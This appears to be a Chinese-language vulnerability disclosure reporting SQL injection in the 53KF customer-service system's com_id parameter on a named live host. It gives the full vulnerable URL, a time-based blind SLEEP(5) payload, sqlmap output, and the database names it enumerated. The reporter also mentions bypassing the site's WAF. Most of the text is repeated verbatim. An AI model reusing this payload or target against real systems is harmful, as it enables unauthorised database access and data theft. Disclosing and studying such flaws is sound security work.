VULHUB ™

### 简要描述： rt ### 详细说明： 53KF的客服系统存在sql注入 晚上你们服务器有waf 好不容易绕过了 早上发现却没有了 奇怪 www5.53kf.com/fenci/robot_fenci.php?cmd=CR&com_id=72000079&robot_id=971b5d68cdd2d141e86978b8afa02f21&q_id=1e278e4878dc8de61694c69482d20b6d&val=4 com_id存在注入 ``` Place: GET Parameter: com_id Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cmd=CR&com_id=72000079' AND SLEEP(5) AND 'SvIC'='SvIC&robot_id=971b5d68cdd2d141e86978b8afa02f21&q_id=1e278e4878dc8de61694c69482d20b6d&val=4 --- [10:10:24] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5.0.11 [10:10:24] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www5.53kf.com' ``` ``` available databases [4]: [*] information_schema [*] ip [*] talk [*] test ``` 对应库234个 盲注太慢 ### 漏洞证明： 53KF的客服系统存在sql注入 晚上你们服务器有waf 好不容易绕过了 早上发现却没有了 奇怪 www5.53kf.com/fenci/robot_fenci.php?cmd=CR&com_id=72000079&robot_id=971b5d68cdd2d141e86978b8afa02f21&q_id=1e278e4878dc8de61694c69482d20b6d&val=4 com_id存在注入 ``` Place: GET...

### 简要描述： rt ### 详细说明： 53KF的客服系统存在sql注入 晚上你们服务器有waf 好不容易绕过了 早上发现却没有了 奇怪 www5.53kf.com/fenci/robot_fenci.php?cmd=CR&com_id=72000079&robot_id=971b5d68cdd2d141e86978b8afa02f21&q_id=1e278e4878dc8de61694c69482d20b6d&val=4 com_id存在注入 ``` Place: GET Parameter: com_id Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cmd=CR&com_id=72000079' AND SLEEP(5) AND 'SvIC'='SvIC&robot_id=971b5d68cdd2d141e86978b8afa02f21&q_id=1e278e4878dc8de61694c69482d20b6d&val=4 --- [10:10:24] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5.0.11 [10:10:24] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www5.53kf.com' ``` ``` available databases [4]: [*] information_schema [*] ip [*] talk [*] test ``` 对应库234个 盲注太慢 ### 漏洞证明： 53KF的客服系统存在sql注入 晚上你们服务器有waf 好不容易绕过了 早上发现却没有了 奇怪 www5.53kf.com/fenci/robot_fenci.php?cmd=CR&com_id=72000079&robot_id=971b5d68cdd2d141e86978b8afa02f21&q_id=1e278e4878dc8de61694c69482d20b6d&val=4 com_id存在注入 ``` Place: GET Parameter: com_id Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cmd=CR&com_id=72000079' AND SLEEP(5) AND 'SvIC'='SvIC&robot_id=971b5d68cdd2d141e86978b8afa02f21&q_id=1e278e4878dc8de61694c69482d20b6d&val=4 --- [10:10:24] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5.0.11 [10:10:24] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www5.53kf.com' ``` ``` available databases [4]: [*] information_schema [*] ip [*] talk [*] test ``` 对应库234个 盲注太慢